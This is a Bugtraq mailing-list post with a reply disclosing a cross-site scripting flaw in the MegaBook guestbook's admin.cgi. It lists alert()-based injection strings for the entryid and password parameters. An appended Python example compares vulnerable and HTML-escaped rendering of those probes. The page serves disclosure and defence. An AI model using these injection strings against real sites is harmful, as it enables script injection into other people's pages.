Bugtraq mailing list archives

Re: MegaBook V2.0 - Cross Site Scripting Exploit


From: Spy Hat <spyhat () spyhat com>
Date: 8 May 2005 12:06:01 -0000

In-Reply-To: <20050505104551.23441.qmail () www securityfocus com>

The same vulnerability also exists in the new version, MegaBook V2.1.

Date: 5 May 2005 10:45:51 -0000
Message-ID: <20050505104551.23441.qmail () www securityfocus com>
From: Spy Hat <spyhat () spyhat com>
To: bugtraq () securityfocus com
Subject: MegaBook V2.0 - Cross Site Scripting Exploit



The ultimate CGI guestbook script MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. The affected script is admin.cgi.

URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi) 

I have tested the script with the following query:

?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script>

I have also tested the script with these POST variables:

action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script>

action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script>

action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script>

action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script>

action=modifypost&entryid=66&password=</textarea><script>alert('wvs-xss-magic-string-723975367');</script>


Yours,
SpyHat
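
The probes in the post differ only in the characters in front of the script tag, and that prefix is what decides whether a payload leaves the HTML context it is reflected into. The following is an added example, not code from the post or from MegaBook itself. The form markup is a constructed stand-in for the modifypost form (the post does not show admin.cgi's real HTML), the probes are reduced to their break-out prefix with a fixed alert() placeholder, and LiveScriptCounter is a helper written here to count script tags that would actually execute.

```python
import html
from html.parser import HTMLParser

# Probe strings from the post above, reduced to the part that matters: the
# prefix that tries to break out of the surrounding markup. The alert text is
# a fixed placeholder, not the scanner's magic strings.
PROBES = {
    "bare":     "<script>alert(1)</script>",
    "dquote":   '"><script>alert(1)</script>',
    "squote":   "'><script>alert(1)</script>",
    "gt":       "><script>alert(1)</script>",
    "textarea": "</textarea><script>alert(1)</script>",
}

# Constructed stand-in for the modifypost form (an assumption: the post does
# not show admin.cgi's markup). The same untrusted value is reflected into a
# double-quoted attribute, a single-quoted attribute and a textarea body.
FORM = (
    '<form method="post" action="admin.cgi">\n'
    '<input type="hidden" name="action" value="modifypost">\n'
    '<input type="text" name="entryid" value="{v}">\n'
    "<input type='password' name='password' value='{v}'>\n"
    '<textarea name="message">{v}</textarea>\n'
    "</form>"
)


def render_vulnerable(value: str) -> str:
    """Reflects the untrusted value verbatim, the behaviour the post reports."""
    return FORM.format(v=value)


def render_hardened(value: str) -> str:
    """Same markup, but the value is HTML-escaped with quote=True so that
    ", ', <, > and & can neither close the attribute nor open a tag.
    html.escape fits quoted attributes and element text; a value placed in
    an unquoted attribute, a URL or an inline script needs other handling."""
    return FORM.format(v=html.escape(value, quote=True))


class LiveScriptCounter(HTMLParser):
    """Counts <script> start tags a browser would execute.

    A payload still inside an attribute value never reaches handle_starttag,
    and one inside <textarea> is ignored via in_textarea, because browsers
    treat textarea content as text (RCDATA) however html.parser tokenizes it.
    """

    def __init__(self) -> None:
        super().__init__()
        self.in_textarea = False
        self.live_scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "textarea":
            self.in_textarea = True
        elif tag == "script" and not self.in_textarea:
            self.live_scripts += 1

    def handle_endtag(self, tag):
        if tag == "textarea":
            self.in_textarea = False


def live_scripts(page: str) -> int:
    parser = LiveScriptCounter()
    parser.feed(page)
    parser.close()
    return parser.live_scripts


def probe_matrix(render) -> dict:
    """Runs every probe through a renderer; each value is the number of
    reflection sites the probe escaped, i.e. live <script> tags produced."""
    return {name: live_scripts(render(payload)) for name, payload in PROBES.items()}


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        print(label, probe_matrix(render))
```

Against the vulnerable renderer only the quote-prefixed and `</textarea>` probes score, one site each: the bare and `>` probes never leave a quoted attribute or a textarea, which is exactly why a scanner tries the prefixed variants (a lone `>` would only matter for an unquoted attribute, which this mock form does not contain). Against the hardened renderer every probe scores zero, because no `<` survives escaping, so nothing the user controls is ever tokenized as a tag.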


